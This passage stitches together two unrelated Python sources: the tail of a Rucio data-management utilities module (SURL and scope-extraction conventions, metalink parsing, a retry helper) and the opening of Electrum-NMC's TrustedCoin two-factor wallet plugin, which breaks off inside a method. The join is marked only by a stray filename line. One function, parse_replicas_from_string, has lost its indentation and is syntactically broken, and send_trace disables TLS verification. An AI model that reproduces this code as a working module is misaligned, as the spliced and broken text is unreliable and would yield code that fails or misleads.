    if nfields >= 3:
        return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
    elif nfields == 1:
        return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
    elif nfields == 2:
        # bug fix: the original indexed fields[2], which does not exist for a
        # two-field DSN and raised IndexError; pad the missing field with 'other'
        return '/%s/%s/%s/%s/%s' % (fields[0], fields[1], 'other', dsn, filename)
    # defensive fallback only: str.split never returns an empty list
    return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
    """
    Defines relative SURL for Belle II specific replicas.
    This method contains the Belle II convention.
    To be used for non-deterministic Belle II sites.
    DSN (or datablock in the Belle II naming) contains /
    """
    parts = dsn.split("/")
    if len(parts) == 0:
        # defensive only: str.split always yields at least one element
        return '/other/%s' % (filename)
    return '%s/%s' % (dsn, filename)
# Registry of SURL construction algorithms, keyed by naming-convention name.
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'


def register_surl_algorithm(surl_callable, name=None):
    """ Register *surl_callable* under *name* (defaults to the callable's __name__). """
    key = surl_callable.__name__ if name is None else name
    _SURL_ALGORITHMS[key] = surl_callable


register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
    """ Build a relative SURL for (dsn, filename) with the requested naming convention.

    Unknown or missing conventions fall back to the default algorithm.
    """
    # ensure that policy package is loaded in case it registers its own algorithms
    import rucio.common.schema  # noqa: F401
    algorithm = _SURL_ALGORITHMS.get(naming_convention)
    if algorithm is None:
        algorithm = _SURL_ALGORITHMS[_DEFAULT_SURL]
    return algorithm(dsn, filename)
def __strip_dsn(dsn):
    """
    Drop the _dis, _sub and _frag suffixes for panda datasets from the lfc path
    they will be registered in.
    Method imported from DQ2.

    :param dsn: the dataset name.
    :returns: the dataset name with any suffix stripped from its last field.
    """
    suffixes_to_drop = ['_dis', '_sub', '_frag']
    fields = dsn.split('.')
    # str.split always returns at least one element, so fields[-1] is safe.
    # The original wrapped this loop in try/except IndexError, but re.sub
    # cannot raise IndexError — the guard was dead code and has been removed.
    last_field = fields[-1]
    for suffix in suffixes_to_drop:
        last_field = re.sub('%s.*$' % suffix, '', last_field)
    fields[-1] = last_field
    return '.'.join(fields)
def __strip_tag(tag):
    """
    Drop the _dis, _sub and _tid suffixes for panda datasets from the lfc path
    they will be registered in.
    Method imported from DQ2.

    :param tag: the version tag (typically the last DSN field).
    :returns: the tag with any suffix stripped.
    """
    suffixes_to_drop = ['_dis', '_sub', '_tid']
    stripped_tag = tag
    # The original guarded this loop with try/except IndexError, but re.sub
    # cannot raise IndexError — the guard was dead code and has been removed.
    for suffix in suffixes_to_drop:
        stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
    return stripped_tag
def clean_surls(surls):
    """ Normalize a list of SURLs and return them sorted.

    SRM URLs get their port and web-service prefix stripped; Google Storage
    signed URLs get their access-id query arguments removed.
    """
    cleaned = []
    for surl in surls:
        if surl.startswith('srm'):
            surl = re.sub(':[0-9]+/', '/', surl)
            for ws_prefix in ('/srm/managerv1\?SFN=',   # NOQA: W605
                              '/srm/v2/server\?SFN=',   # NOQA: W605
                              '/srm/managerv2\?SFN='):  # NOQA: W605
                surl = re.sub(ws_prefix, '', surl)
        if surl.startswith('https://storage.googleapis.com'):
            surl = surl.split('?GoogleAccessId')[0]
        cleaned.append(surl)
    return sorted(cleaned)
# Registry of scope-extraction algorithms, keyed by policy name.
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'


def extract_scope_atlas(did, scopes):
    """ Extract (scope, name) from a DID using the ATLAS convention.

    An explicit 'scope:name' form wins; otherwise the scope is the first
    dotted field (first two fields for user/group DIDs). A trailing '/'
    is dropped from the name.
    """
    if did.find(':') > -1:
        # explicit 'scope:name' form
        if len(did.split(':')) > 2:
            raise RucioException('Too many colons. Cannot extract scope and name')
        scope, name = did.split(':')[0], did.split(':')[1]
        if name.endswith('/'):
            name = name[:-1]
        return scope, name
    scope = did.split('.')[0]
    if did.startswith('user') or did.startswith('group'):
        # user/group scopes keep the second dotted field as well
        scope = ".".join(did.split('.')[0:2])
    if did.endswith('/'):
        did = did[:-1]
    return scope, did
def extract_scope_belleii(did, scopes):
    """ Extract (scope, name) from a DID using the Belle II convention.

    The scope is derived from the leading components of the /-separated
    datablock path; the DID itself is always returned unchanged as the name.

    :param did: the DID (datablock path containing '/').
    :param scopes: container of known scope names, consulted to validate
                   user.<x> and group.<x> scopes.
    :returns: tuple (scope, did).
    """
    split_did = did.split('/')
    if did.startswith('/belle/MC/'):
        # fixed lists of path prefixes decide between 'mc' and 'mc_tmp'
        if did.startswith('/belle/MC/BG') or \
           did.startswith('/belle/MC/build') or \
           did.startswith('/belle/MC/generic') or \
           did.startswith('/belle/MC/log') or \
           did.startswith('/belle/MC/mcprod') or \
           did.startswith('/belle/MC/prerelease') or \
           did.startswith('/belle/MC/release'):
            return 'mc', did
        if did.startswith('/belle/MC/cert') or \
           did.startswith('/belle/MC/dirac') or \
           did.startswith('/belle/MC/dr3') or \
           did.startswith('/belle/MC/fab') or \
           did.startswith('/belle/MC/hideki') or \
           did.startswith('/belle/MC/merge') or \
           did.startswith('/belle/MC/migration') or \
           did.startswith('/belle/MC/skim') or \
           did.startswith('/belle/MC/test'):
            return 'mc_tmp', did
        # otherwise look at the 4th path component for known keywords
        if len(split_did) > 4:
            if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
                return 'mc_tmp', did
            if split_did[3].find('release') > -1:
                return 'mc', did
        return 'mc_tmp', did
    if did.startswith('/belle/Raw/'):
        return 'raw', did
    if did.startswith('/belle/hRaw'):
        return 'hraw', did
    if did.startswith('/belle/user/'):
        # prefer a per-user scope ('user.<name>') when it is already known
        if len(split_did) > 4:
            # path like /belle/user/<initial>/<name>/...
            if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
                return 'user.%s' % split_did[4], did
        if len(split_did) > 3:
            if 'user.%s' % (split_did[3]) in scopes:
                return 'user.%s' % split_did[3], did
        return 'user', did
    if did.startswith('/belle/group/'):
        # prefer a per-group scope ('group.<name>') when it is already known
        if len(split_did) > 3:
            if 'group.%s' % (split_did[3]) in scopes:
                return 'group.%s' % split_did[3], did
        return 'group', did
    if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
        if len(split_did) > 4:
            if split_did[3] in ['fab', 'skim']:  # /belle/Data/fab --> data_tmp
                return 'data_tmp', did
            if split_did[3].find('release') > -1:  # /belle/Data/release --> data
                return 'data', did
        if len(split_did) > 5:
            if split_did[3] in ['proc']:  # /belle/Data/proc
                if split_did[4].find('release') > -1:  # /belle/Data/proc/release*
                    if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
                                                               'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
                                                               'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
                                                               'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
                                                               'SkimB10x1', 'SkimB11x1']:  # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
                        return 'data_tmp', did
                    else:  # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
                        return 'data', did
                if split_did[4].find('fab') > -1:  # /belle/Data/proc/fab* --> data_tmp
                    return 'data_tmp', did
        return 'data_tmp', did
    if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/'):
        return 'test', did
    return 'other', did
def register_extract_scope_algorithm(extract_callable, name=None):
    """ Register *extract_callable* in the scope-extraction registry.

    :param extract_callable: function taking (did, scopes) and returning (scope, name).
    :param name: registry key; defaults to the callable's __name__.
    """
    # bug fix: the default used to be a mutable list ([]), which is never None,
    # so calling without *name* tried to use an unhashable list as the key
    if name is None:
        name = extract_callable.__name__
    _EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable


register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
def extract_scope(did, scopes=None):
    """ Extract (scope, name) from *did* using the configured algorithm.

    The algorithm name is read from the 'common/extract_scope' config option;
    unknown or missing values fall back to the default convention.
    """
    convention = config_get('common', 'extract_scope', False, None)
    if convention not in _EXTRACT_SCOPE_ALGORITHMS:
        # covers both a missing option (None) and an unregistered name
        convention = _DEFAULT_EXTRACT
    return _EXTRACT_SCOPE_ALGORITHMS[convention](did=did, scopes=scopes)
def pid_exists(pid):
    """
    Check whether pid exists in the current process table.
    UNIX only.

    :param pid: process id to check.
    :returns: True when the process exists, False otherwise.
    :raises ValueError: for pid 0, which signals the whole process group.
    """
    if pid < 0:
        return False
    if pid == 0:
        # According to "man 2 kill" PID 0 refers to every process in the
        # process group of the calling process; on certain systems 0 is a
        # valid PID but there is no portable way to know, so refuse it.
        raise ValueError('invalid PID 0')
    try:
        # signal 0 performs the permission checks without sending anything
        os.kill(pid, 0)
    except OSError as err:
        if err.errno == errno.ESRCH:
            # ESRCH == No such process
            return False
        if err.errno == errno.EPERM:
            # EPERM clearly means there's a process to deny access to
            return True
        # per "man 2 kill" the only other possible error is EINVAL
        raise
    return True
def sizefmt(num, human=True):
    """
    Print human readable file sizes.

    :param num: the size (int/float/str convertible to int); None yields '0.0 B'.
    :param human: when True scale with decimal (1000-based) unit prefixes.
    """
    if num is None:
        return '0.0 B'
    try:
        num = int(num)
        if not human:
            return str(num)
        for unit in ('', 'k', 'M', 'G', 'T', 'P', 'E', 'Z'):
            if abs(num) < 1000.0:
                return "%3.3f %sB" % (num, unit)
            num /= 1000.0
        return "%.1f %sB" % (num, 'Y')
    except OverflowError:
        return 'Inf'
def get_tmp_dir():
    """
    Get a path where to store temporary files.

    Rucio searches a standard list of temporary directories (TMP, TMPDIR,
    TEMP environment variables, falling back to /tmp/) via tempfile, then
    appends a per-user subdirectory: the user name if resolvable, else the
    numeric uid, else nothing.

    :return: A path.
    """
    base_dir = os.path.abspath(tempfile.gettempdir())
    for user_part in (getpass.getuser, lambda: str(os.getuid())):
        try:
            return os.path.join(base_dir, user_part())
        except Exception:
            continue
    return base_dir
def is_archive(name):
    '''
    Check if a file name is an archive file or not.

    :param name: the file name to test (matched case-insensitively).
    :return: A boolean.
    '''
    archive_pattern = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
    return bool(re.match(archive_pattern, name, re.I))
class Color:
    """ ANSI escape sequences for colored/emphasized terminal output.

    Emit one of these before text and END afterwards to reset the style.
    """
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    DARKCYAN = '\033[36m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    END = '\033[0m'
def detect_client_location():
    """
    Open a UDP socket to a machine on the internet, to get the local IPv4 and IPv6
    addresses of the requesting client.

    Try to determine the sitename automatically from common environment variables,
    in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
    use the fixed string 'ROAMING'.

    :returns: dict with keys 'ip', 'ip6', 'fqdn' and 'site'.
    """
    def _local_addr(family, probe_addr, fallback):
        # connect() on a UDP socket sends no packets; it only selects the
        # local address that would be used to reach probe_addr
        sock = None
        try:
            sock = socket.socket(family, socket.SOCK_DGRAM)
            sock.connect((probe_addr, 80))
            return sock.getsockname()[0]
        except Exception:
            return fallback
        finally:
            # bug fix: the probe sockets were previously never closed (fd leak)
            if sock is not None:
                sock.close()

    ip = _local_addr(socket.AF_INET, "8.8.8.8", '0.0.0.0')
    ip6 = _local_addr(socket.AF_INET6, "2001:4860:4860:0:0:0:0:8888", '::')
    site = os.environ.get('SITE_NAME',
                          os.environ.get('ATLAS_SITE_NAME',
                                         os.environ.get('OSG_SITE_NAME',
                                                        'ROAMING')))
    return {'ip': ip,
            'ip6': ip6,
            'fqdn': socket.getfqdn(),
            'site': site}
def ssh_sign(private_key, message):
    """
    Sign a string message using the private key.

    :param private_key: The SSH RSA private key as a string.
    :param message: The message to sign as a string.
    :return: Base64 encoded signature as a string.
    :raises MissingModuleException: when paramiko is unavailable.
    """
    if PY3 and isinstance(message, str):
        # paramiko signs bytes, not text
        message = message.encode()
    if not EXTRA_MODULES['paramiko']:
        raise MissingModuleException('The paramiko module is not installed or faulty.')
    sio_private_key = StringIO(private_key)
    priv_k = RSAKey.from_private_key(sio_private_key)
    sio_private_key.close()
    signature_stream = priv_k.sign_ssh_data(message)
    signature_stream.rewind()
    base64_encoded = base64.b64encode(signature_stream.get_remainder())
    if PY3:
        # return text rather than bytes on Python 3
        base64_encoded = base64_encoded.decode()
    return base64_encoded
def make_valid_did(lfn_dict):
    """
    When managing information about a LFN (such as in `rucio upload` or
    the RSE manager's upload), the `filename` attribute records the name
    of the file on local disk in addition to the rest of the DID info.

    Return a copy of the dictionary with that extra `filename` key removed
    (using it as the `name` when none is present), so the result passes the
    DID JSON schema validation. The input dictionary is left untouched.
    """
    did = dict(lfn_dict)
    did.setdefault('name', did['filename'])
    del did['filename']
    return did
def send_trace(trace, trace_endpoint, user_agent, retries=5):
    """
    Send the given trace to the trace endpoint

    :param trace: the trace dictionary to send
    :param trace_endpoint: the endpoint where the trace should be send
    :param user_agent: the user agent sending the trace
    :param retries: the number of retries if sending fails
    :return: 0 on success, 1 on failure
    """
    # pilot traces are reported through a different channel
    if user_agent.startswith('pilot'):
        return 0
    for _attempt in range(retries):
        try:
            requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
            return 0
        except Exception:
            continue
    return 1
def add_url_query(url, query):
    """
    Add a new dictionary to URL parameters

    :param url: The existing URL
    :param query: A dictionary containing key/value pairs to be added to the URL
    :return: The expanded URL with the new query parameters
    """
    parts = list(urlparse.urlparse(url))
    # merge existing query string with the new parameters (new ones win)
    params = dict(urlparse.parse_qsl(parts[4]))
    params.update(query)
    parts[4] = urlencode(params)
    return urlparse.urlunparse(parts)
def get_bytes_value_from_string(input_string):
    """
    Get bytes from a string that represents a storage value and unit

    :param input_string: String containing a value and an unit
    :return: Integer value representing the value in bytes, or False when
             the string does not match '<digits><unit>' with a known unit
    """
    multipliers = {'b': 1,
                   'kb': 1000,
                   'mb': 1000000,
                   'gb': 1000000000,
                   'tb': 1000000000000,
                   'pb': 1000000000000000}
    match = re.match(r'^([0-9]+)([A-Za-z]+)$', input_string)
    if not match:
        return False
    value, unit = match.groups()
    factor = multipliers.get(unit.lower())
    if factor is None:
        return False
    return int(value) * factor
def parse_did_filter_from_string(input_string):
    """
    Parse DID filter options in format 'length<3,type=all' from string.

    :param input_string: String containing the filter options.
    :return: filter dictionary and type as string.
    :raises InvalidType: when a 'type=' value is not one of the valid types.
    :raises ValueError: when a length comparison value is not an integer.
    """
    filters = {}
    type = 'collection'
    if input_string:
        filter_options = input_string.replace(' ', '').split(',')
        for option in filter_options:
            value = None
            key = None
            # longer operators must be tested before their one-char prefixes
            if '>=' in option:
                key, value = option.split('>=')
                if key == 'length':
                    key = 'length.gte'
            elif '>' in option:
                key, value = option.split('>')
                if key == 'length':
                    key = 'length.gt'
            elif '<=' in option:
                key, value = option.split('<=')
                if key == 'length':
                    key = 'length.lte'
            elif '<' in option:
                key, value = option.split('<')
                if key == 'length':
                    key = 'length.lt'
            elif '=' in option:
                key, value = option.split('=')
                # date bounds are parsed as UTC-style ISO timestamps
                if key == 'created_after' or key == 'created_before':
                    value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
            if key == 'type':
                if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
                    type = value.lower()
                else:
                    raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
            elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
                try:
                    value = int(value)
                    filters[key] = value
                except ValueError:
                    raise ValueError('Length has to be an integer value.')
                # NOTE(review): this repeats the assignment already made in the
                # try block above; redundant but harmless, kept for fidelity
                filters[key] = value
            elif isinstance(value, string_types):
                # normalize boolean-like strings to '1'/'0'
                if value.lower() == 'true':
                    value = '1'
                elif value.lower() == 'false':
                    value = '0'
                filters[key] = value
            else:
                filters[key] = value
    return filters, type
def parse_replicas_from_file(path):
    """
    Parses the output of list_replicas from a json or metalink file
    into a dictionary. Metalink parsing is tried first and if it fails
    it tries to parse json.

    :param path: the path to the input file
    :returns: a list with a dictionary for each file
    :raises MetalinkJsonParsingError: when the file is neither valid
        metalink XML nor valid JSON.
    """
    with open(path) as fp:
        try:
            root = ElementTree.parse(fp).getroot()
            return parse_replicas_metalink(root)
        except ElementTree.ParseError as xml_err:
            try:
                # bug fix: the XML parser consumes part of the stream before
                # failing; rewind so the JSON parser sees the whole file
                fp.seek(0)
                return json.load(fp)
            except ValueError as json_err:
                raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
    """
    Transforms the metalink tree into a list of dictionaries where
    each dictionary describes a file with its replicas.
    Will be called by parse_replicas_from_file and parse_replicas_from_string.

    :param root: root node of the metalink tree
    :returns: a list with a dictionary for each file
    :raises InputValidationError: when a <file> tag lacks an identity tag.
    """
    files = []
    # metalink namespace
    ns = '{urn:ietf:params:xml:ns:metalink}'
    str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
    # loop over all <file> tags of the metalink string
    for file_tag_obj in root.findall(ns + 'file'):
        # search for identity-tag; its text holds the DID
        identity_tag_obj = file_tag_obj.find(ns + 'identity')
        if not ElementTree.iselement(identity_tag_obj):
            raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
        cur_file = {'did': identity_tag_obj.text,
                    'adler32': None,
                    'md5': None,
                    'sources': []}
        parent_dids = set()
        parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
        if ElementTree.iselement(parent_dids_tag_obj):
            for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
                parent_dids.add(did_tag_obj.text)
        cur_file['parent_dids'] = parent_dids
        size_tag_obj = file_tag_obj.find(ns + 'size')
        cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
        # hash tags carry a 'type' attribute (e.g. adler32, md5) and the digest text
        for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
            hash_type = hash_tag_obj.get('type')
            if hash_type:
                cur_file[hash_type] = hash_tag_obj.text
        # each url tag becomes one source dict: attributes are copied with
        # 'location' renamed to 'rse' and boolean-like strings converted
        for url_tag_obj in file_tag_obj.findall(ns + 'url'):
            key_rename_map = {'location': 'rse'}
            src = {}
            for k, v in url_tag_obj.items():
                k = key_rename_map.get(k, k)
                src[k] = str_to_bool.get(v, v)
            src['pfn'] = url_tag_obj.text
            cur_file['sources'].append(src)
        files.append(cur_file)
    return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
    """
    Get a thread where a function runs periodically.

    :param interval: Interval in seconds when the action function should run.
    :param action: Function, that should run periodically.
    :param graceful_stop: Threading event used to check for graceful stop.
    :returns: a (not yet started) threading.Thread.
    """
    def start():
        while not graceful_stop.is_set():
            starttime = time.time()
            action()
            # bug fix: when the action runs longer than the interval, the old
            # code passed a negative value to time.sleep(), raising ValueError
            time.sleep(max(0, interval - (time.time() - starttime)))
    t = threading.Thread(target=start)
    return t
def run_cmd_process(cmd, timeout=3600):
    """
    shell command parser with timeout

    :param cmd: shell command as a string
    :param timeout: in seconds
    :return: errorcode, and stdout (with stderr appended after ' Error: '
             when stderr is non-empty)
    """
    # bug fixes vs. the previous version:
    # - elapsed time was measured with datetime.now().second, which wraps
    #   every minute and made the timeout unreliable; use communicate(timeout=)
    # - stdout/stderr were bytes, so '+ " Error: "' and the
    #   "'Command time-out' in stdout" check raised TypeError on Python 3;
    #   universal_newlines=True makes them text
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               shell=True, universal_newlines=True, preexec_fn=os.setsid)
    try:
        stdout, stderr = process.communicate(timeout=timeout)
    except subprocess.TimeoutExpired:
        # escalate politely: terminate first, then kill if still alive
        process.terminate()
        try:
            stdout, stderr = process.communicate(timeout=3)
        except subprocess.TimeoutExpired:
            process.kill()
            stdout, stderr = process.communicate()
    stdout = stdout or ''
    stderr = stderr or ''
    if stderr:
        stdout += " Error: " + stderr
    returncode = process.returncode
    if returncode != 1 and 'Command time-out' in stdout:
        returncode = 1
    if returncode is None:
        returncode = 0
    return returncode, stdout
def api_update_return_dict(dictionary):
    """
    Ensure that human-readable RSE names and external account/scope
    representations are present in a dictionary returned from core.

    :param dictionary: The dictionary to edit
    :returns dictionary: The edited dictionary
    """
    if not isinstance(dictionary, dict):
        return dictionary
    copied = False  # copy lazily, only on first mutation, to avoid caller side effects
    for rse_str in ('rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse'):
        rse_id_str = '%s_id' % rse_str
        if dictionary.get(rse_id_str) is not None and rse_str not in dictionary:
            if not copied:
                dictionary = dictionary.copy()
                copied = True
            import rucio.core.rse
            dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
    for attr in ('account', 'scope'):
        if dictionary.get(attr) is not None:
            if not copied:
                dictionary = dictionary.copy()
                copied = True
            # internal account/scope objects expose their external string form
            dictionary[attr] = dictionary[attr].external
    return dictionary
def get_parsed_throttler_mode(throttler_mode):
    """ Parse the conveyor-throttler mode string.

    :param throttler_mode: one of 'DEST_PER_ACT', 'DEST_PER_ALL_ACT',
        'SRC_PER_ACT', 'SRC_PER_ALL_ACT'; anything else yields (None, None).
    :returns: tuple (direction, all_activities).
    """
    modes = {
        'DEST_PER_ACT': ('destination', False),
        'DEST_PER_ALL_ACT': ('destination', True),
        'SRC_PER_ACT': ('source', False),
        'SRC_PER_ALL_ACT': ('source', True),
    }
    return modes.get(throttler_mode, (None, None))
def query_bunches(query, bunch_by):
    """
    Queries output by yield_per sqlalchemy function
    (which in a for loop returns rows one by one).
    Groups the query rows in bunches of bunch_by
    elements and returns list of bunches.

    :param query: sqlalchemy session query
    :param bunch_by: integer number
    :returns: [[bunch_of_tuples_1],[bunch_of_tuples_2],...]
    """
    bunches = []
    current = []
    for row in query.yield_per(bunch_by):
        if isinstance(row, (tuple, list)):
            # row is a tuple/list with the column elements of the row
            current.extend(row)
        else:
            # row is a single scalar / model object
            current.append(row)
        if len(current) % bunch_by == 0:
            bunches.append(current)
            current = []
    if current:
        bunches.append(current)
    return bunches
class retry:
    """Retry callable object with configurable number of attempts"""

    def __init__(self, func, *args, **kwargs):
        '''
        :param func: a method that should be executed with retries
        :param args: positional parameters of the func
        :param kwargs: key word arguments of the func
        '''
        self.func = func
        self.args = args
        self.kwargs = kwargs

    def __call__(self, mtries=3, logger=None):
        '''
        :param mtries: maximum number of attempts to execute the function
        :param logger: preferred logger
        '''
        # the first mtries-1 attempts swallow exceptions ...
        for attempt_no in range(1, mtries):
            try:
                if logger:
                    logger.debug('{}: Attempt {}'.format(self.func.__name__, attempt_no))
                return self.func(*self.args, **self.kwargs)
            except Exception as error:
                if logger:
                    logger.debug('{}: Attempt failed {}'.format(self.func.__name__, attempt_no))
                    logger.debug(str(error))
        # ... the final attempt propagates any exception to the caller
        return self.func(*self.args, **self.kwargs)
|
trustedcoin.py | #!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import requests
import json
from urllib.parse import urljoin
from urllib.parse import quote
import electrum_nmc as electrum
from electrum_nmc import bitcoin
from electrum_nmc import constants
from electrum_nmc import keystore
from electrum_nmc.bitcoin import *
from electrum_nmc.mnemonic import Mnemonic
from electrum_nmc import version
from electrum_nmc.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_nmc.i18n import _
from electrum_nmc.plugins import BasePlugin, hook
from electrum_nmc.util import NotEnoughFunds
from electrum_nmc.storage import STO_EV_USER_PW
def get_signing_xpub():
    """ Return TrustedCoin's signing xpub for the active network.

    Hardcoded so that the wallet can be restored from seed without
    TrustedCoin's server.
    """
    if constants.net.TESTNET:
        return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
    return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
    """ Return TrustedCoin's billing xpub for the active network. """
    if constants.net.TESTNET:
        return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
    return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
# Seed prefix identifying 2FA (two-factor) wallet seeds.
SEED_PREFIX = version.SEED_PREFIX_2FA
# Paragraphs shown to the user before enabling the TrustedCoin service.
DISCLAIMER = [
    _("Two-factor authentication is a service provided by TrustedCoin. "
      "It uses a multi-signature wallet, where you own 2 of 3 keys. "
      "The third key is stored on a remote server that signs transactions on "
      "your behalf. To use this service, you will need a smartphone with "
      "Google Authenticator installed."),
    _("A small fee will be charged on each transaction that uses the "
      "remote server. You may check and modify your billing preferences "
      "once the installation is complete."),
    _("Note that your coins are not locked in this service. You may withdraw "
      "your funds at any time and at no cost, without the remote server, by "
      "using the 'restore wallet' option with your wallet seed."),
    _("The next step will generate the seed of your wallet. This seed will "
      "NOT be saved in your computer, and it must be stored on paper. "
      "To be safe from malware, you may want to do this on an offline "
      "computer, and move your wallet later to an online computer."),
]
# Prompt shown when restoring an existing 2FA wallet from its seed.
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
    """Error reported by the TrustedCoin API, carrying the HTTP status code."""

    def __init__(self, message, status_code=0):
        super().__init__(message)
        self.status_code = status_code
class ErrorConnectingServer(Exception):
    """Raised when the HTTP request to the TrustedCoin server itself fails."""
    pass
class TrustedCoinCosignerClient(object):
    """Thin HTTP client for the TrustedCoin cosigner REST API."""

    def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
        self.base_url = base_url
        self.debug = False
        self.user_agent = user_agent

    def send_request(self, method, relative_url, data=None, headers=None):
        """
        Issue an HTTP request against the API and decode the response.

        :param method: 'get' or 'post'
        :param relative_url: path relative to the base URL
        :param data: query parameters (get) or JSON body (post)
        :param headers: optional dict of extra HTTP headers (defaults keep
            the previous behavior; added so callers can pass signatures)
        :returns: decoded JSON for JSON responses, otherwise the raw text
        :raises ErrorConnectingServer: when the request itself fails
        :raises TrustedCoinException: for any non-200 response
        """
        kwargs = {'headers': {}}
        if headers:
            kwargs['headers'].update(headers)
        if self.user_agent:
            kwargs['headers']['user-agent'] = self.user_agent
        if method == 'get' and data:
            kwargs['params'] = data
        elif method == 'post' and data:
            kwargs['data'] = json.dumps(data)
            kwargs['headers']['content-type'] = 'application/json'
        url = urljoin(self.base_url, relative_url)
        if self.debug:
            print('%s %s %s' % (method, url, data))
        try:
            response = requests.request(method, url, **kwargs)
        except Exception as e:
            raise ErrorConnectingServer(e)
        if self.debug:
            print(response.text)
        if response.status_code != 200:
            message = str(response.text)
            if response.headers.get('content-type') == 'application/json':
                r = response.json()
                if 'message' in r:
                    message = r['message']
            raise TrustedCoinException(message, response.status_code)
        if response.headers.get('content-type') == 'application/json':
            return response.json()
        else:
            return response.text

    def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
        """
        Returns the TOS for the given billing plan as a plain/text unicode string.

        :param billing_plan: the plan to return the terms for
        """
        payload = {'billing_plan': billing_plan}
        return self.send_request('get', 'tos', payload)

    def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
        """
